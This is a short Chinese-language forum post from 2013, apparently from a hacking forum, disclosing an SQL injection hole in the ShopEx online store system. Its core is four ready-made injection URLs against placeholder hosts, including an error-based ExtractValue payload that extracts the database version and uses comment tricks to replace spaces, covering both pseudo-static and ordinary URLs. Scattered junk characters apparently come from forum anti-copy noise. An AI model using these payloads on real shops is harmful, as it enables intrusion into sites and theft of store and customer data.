注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…- q5 C& F7 t8 @. l: a3 x" i
! `, D! ^; e) R p1 Q+ R5 M
好吧,我扯远了~~2 ^5 G: G/ v- a" s
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~ _- |% h, l2 q1 C0 z: y# X
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
) k" s- z( U) O: c5 k! p4 q' n; w$ n; Q; f# a+ p$ g
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html9 _" P! P' b2 Z* d; h, Q! w
+ N% c. G% ^! J9 E0 Y' |http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html: W, n$ x' B1 x% Y3 }
( W7 R/ ^) Q" O. M: w$ A5 |http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
6 l7 _' r& ~0 e) ~& T2 r% d) G n) p* @0 h9 F
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
* h* L( L) V- s. i2 b
! w. H# E! G2 W: J$ w [
. J( g2 X! ?/ k- i5 o$ `一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
' e0 E1 `5 \9 @8 |) D# y如何注入就不多说了,10多年的东西了…不会也会了…
/ c3 m3 @; u) {$ U2 G% X' r5 s# I' \
|
发表于 2013-2-4 16:20:04
收藏
支持
反对